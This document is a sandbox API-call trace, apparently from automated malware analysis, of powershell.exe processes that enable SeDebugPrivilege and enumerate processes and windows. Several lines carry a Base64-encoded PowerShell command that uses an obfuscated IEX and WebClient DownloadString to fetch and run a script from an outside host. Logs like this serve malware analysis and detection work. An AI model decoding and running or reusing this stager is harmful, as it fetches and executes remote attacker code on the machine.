	[0702.319] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c81e270 | out: lpFileInformation=0x1c81e270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0702.319] SetErrorMode (uMode=0x1) returned 0x1
	[0702.320] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0702.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.320] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0702.322] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0702.322] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.322] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0702.325] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0702.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.326] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0704.207] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0704.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.208] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0704.224] CoTaskMemAlloc (cb=0x3b) returned 0x4e0300
	[0704.224] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c81e458, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c81e458) returned 0x4550
	[0704.227] CoTaskMemFree (pv=0x4e0300) 
	[0704.230] GetConsoleWindow () returned 0x10434
	[0705.847] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0705.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0705.847] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0705.848] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0705.848] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0705.848] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0705.856] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0705.857] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0705.857] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0705.859] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c81e4a0 | out: pNumArgs=0x1c81e4a0) returned 0x43c4d0*=""
	[0705.860] lstrlenW (lpString="-EncodedCommand") returned 15
	[0705.861] CoTaskMemAlloc (cb=0x22) returned 0x1b8cf200
	[0705.861] RtlMoveMemory (in: Destination=0x1b8cf200, Source=0x43c4f2, Length=0x20 | out: Destination=0x1b8cf200) 
	[0705.861] CoTaskMemFree (pv=0x1b8cf200) 
	[0705.861] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0705.861] CoTaskMemAlloc (cb=0x2f4) returned 0x1b8edaa0
	[0705.862] RtlMoveMemory (in: Destination=0x1b8edaa0, Source=0x43c512, Length=0x2f2 | out: Destination=0x1b8edaa0) 
	[0705.862] CoTaskMemFree (pv=0x1b8edaa0) 
	[0705.862] LocalFree (hMem=0x43c4d0) returned 0x0
	[0705.863] CoTaskMemAlloc (cb=0x804) returned 0x1b8edaa0
	[0705.863] GetConsoleTitleW (in: lpConsoleTitle=0x1b8edaa0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0705.864] CoTaskMemFree (pv=0x1b8edaa0) 
	[0706.024] CoTaskMemAlloc (cb=0x38e) returned 0x43c4d0
	[0706.024] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c81e400*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f222a0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f222a0*(hProcess=0x39c, hThread=0x350, dwProcessId=0x1f8c, dwThreadId=0x1f90)) returned 1
	[0708.636] CoTaskMemFree (pv=0x43c4d0) 
	[0708.637] CloseHandle (hObject=0x350) returned 1
	[0708.637] CoTaskMemAlloc (cb=0x3b) returned 0x4e0300
	[0708.637] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c81e4a8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c81e4a8) returned 0x4550
	[0708.638] CoTaskMemFree (pv=0x4e0300) 
	[0708.641] GetCurrentProcess () returned 0xffffffffffffffff
	[0708.641] GetCurrentProcess () returned 0xffffffffffffffff
	[0708.642] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c81e588, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c81e588*=0x350) returned 1

Process:
	id = "69"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1a958000"
	os_pid = "0x8c0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 337
	os_tid = 0x8bc


Thread:
	id = 413
	os_tid = 0x1060


Thread:
	id = 417
	os_tid = 0x1070


Process:
	id = "70"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x26766000"
	os_pid = "0xbdc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 340
	os_tid = 0xbc8

	[0460.907] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0462.326] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0462.327] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0462.327] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0462.327] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0467.911] GetVersionExW (in: lpVersionInformation=0xade60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xade60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0467.913] GetVersionExW (in: lpVersionInformation=0xade60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xade60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0467.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.927] GetVersionExW (in: lpVersionInformation=0xadbd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadbd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0467.927] SetErrorMode (uMode=0x1) returned 0x1
	[0467.928] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xadd30 | out: lpFileInformation=0xadd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0467.929] SetErrorMode (uMode=0x1) returned 0x1
	[0467.932] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xadfa0 | out: lpdwHandle=0xadfa0) returned 0x94c
	[0467.934] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c372d8 | out: lpData=0x2c372d8) returned 1
	[0467.937] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadf18, puLen=0xadf10 | out: lplpBuffer=0xadf18*=0x2c37374, puLen=0xadf10) returned 1
	[0467.939] lstrlenW (lpString="䅁") returned 1
	[0468.378] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2c37450, puLen=0xade80) returned 1
	[0468.379] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0468.381] CoTaskMemAlloc (cb=0x2e) returned 0x22f300
	[0468.381] lstrcpyW (in: lpString1=0x22f300, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0468.382] CoTaskMemFree (pv=0x22f300) 
	[0468.382] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2c374a4, puLen=0xade80) returned 1
	[0468.383] lstrlenW (lpString="System.Management.Automation") returned 28
	[0468.383] CoTaskMemAlloc (cb=0x3c) returned 0x179860
	[0468.383] lstrcpyW (in: lpString1=0x179860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0468.383] CoTaskMemFree (pv=0x179860) 
	[0468.383] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2c37500, puLen=0xade80) returned 1
	[0468.383] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0468.383] CoTaskMemAlloc (cb=0x20) returned 0x22d630
	[0468.383] lstrcpyW (in: lpString1=0x22d630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0468.383] CoTaskMemFree (pv=0x22d630) 
	[0468.383] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2c37540, puLen=0xade80) returned 1
	[0468.383] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0468.383] CoTaskMemAlloc (cb=0x44) returned 0x179860
	[0468.383] lstrcpyW (in: lpString1=0x179860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0468.383] CoTaskMemFree (pv=0x179860) 
	[0468.383] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2c375a8, puLen=0xade80) returned 1
	[0468.383] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0468.383] CoTaskMemAlloc (cb=0x76) returned 0x1df9a0
	[0468.383] lstrcpyW (in: lpString1=0x1df9a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0468.383] CoTaskMemFree (pv=0x1df9a0) 
	[0468.383] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2c37644, puLen=0xade80) returned 1
	[0468.383] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0468.383] CoTaskMemAlloc (cb=0x44) returned 0x179860
	[0468.383] lstrcpyW (in: lpString1=0x179860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0468.383] CoTaskMemFree (pv=0x179860) 
	[0468.383] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2c376a8, puLen=0xade80) returned 1
	[0468.383] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0468.383] CoTaskMemAlloc (cb=0x58) returned 0x198d00
	[0468.383] lstrcpyW (in: lpString1=0x198d00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0468.383] CoTaskMemFree (pv=0x198d00) 
	[0468.384] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2c37724, puLen=0xade80) returned 1
	[0468.384] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0468.384] CoTaskMemAlloc (cb=0x20) returned 0x22d630
	[0468.384] lstrcpyW (in: lpString1=0x22d630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0468.384] CoTaskMemFree (pv=0x22d630) 
	[0468.384] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2c373cc, puLen=0xade80) returned 1
	[0468.384] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0468.384] CoTaskMemAlloc (cb=0x66) returned 0x227c30
	[0468.384] lstrcpyW (in: lpString1=0x227c30, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0468.384] CoTaskMemFree (pv=0x227c30) 
	[0468.384] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x0, puLen=0xade80) returned 0
	[0468.384] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x0, puLen=0xade80) returned 0
	[0468.384] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x0, puLen=0xade80) returned 0
	[0468.384] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xade58, puLen=0xade50 | out: lplpBuffer=0xade58*=0x2c37374, puLen=0xade50) returned 1
	[0468.385] CoTaskMemAlloc (cb=0x204) returned 0x1e2330
	[0468.385] VerLanguageNameW (in: wLang=0x0, szLang=0x1e2330, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0468.386] CoTaskMemFree (pv=0x1e2330) 
	[0468.387] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\", lplpBuffer=0xadea8, puLen=0xadea0 | out: lplpBuffer=0xadea8*=0x2c37300, puLen=0xadea0) returned 1
	[0468.392] GetCurrentProcessId () returned 0xbdc
	[0468.407] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xacdd0 | out: lpLuid=0xacdd0*(LowPart=0x14, HighPart=0)) returned 1
	[0468.411] GetCurrentProcess () returned 0xffffffffffffffff
	[0468.412] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xacdf0 | out: TokenHandle=0xacdf0*=0x2e0) returned 1
	[0468.412] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2c3ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0468.414] CloseHandle (hObject=0x2e0) returned 1
	[0468.417] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbdc) returned 0x2e0
	[0468.941] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2c3abb8, cb=0x200, lpcbNeeded=0xade08 | out: lphModule=0x2c3abb8, lpcbNeeded=0xade08) returned 1
	[0468.943] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2c3ae28, cb=0x18 | out: lpmodinfo=0x2c3ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0468.944] CoTaskMemAlloc (cb=0x804) returned 0x235600
	[0468.944] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x235600, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0468.945] CoTaskMemFree (pv=0x235600) 
	[0468.945] CoTaskMemAlloc (cb=0x804) returned 0x235600
	[0468.945] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x235600, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0468.945] CoTaskMemFree (pv=0x235600) 
	[0468.946] CloseHandle (hObject=0x2e0) returned 1
	[0468.954] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xbdc) returned 0x2e0
	[0468.955] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0xadf38 | out: lpExitCode=0xadf38*=0x103) returned 1
	[0468.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c3b088, Length=0x20000, ResultLength=0xadf00 | out: SystemInformation=0x12c3b088, ResultLength=0xadf00*=0x2ca90) returned 0xc0000004
	[0468.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b0b8, Length=0x2f290, ResultLength=0xadf00 | out: SystemInformation=0x12c5b0b8, ResultLength=0xadf00*=0x2ca90) returned 0x0
	[0468.980] EnumWindows (lpEnumFunc=0x2ac66ac, lParam=0x0) 
	[0471.316] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.316] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x558
	[0471.316] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.316] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.316] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.316] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x538
	[0471.317] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.317] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x778
	[0471.317] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x778
	[0471.317] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
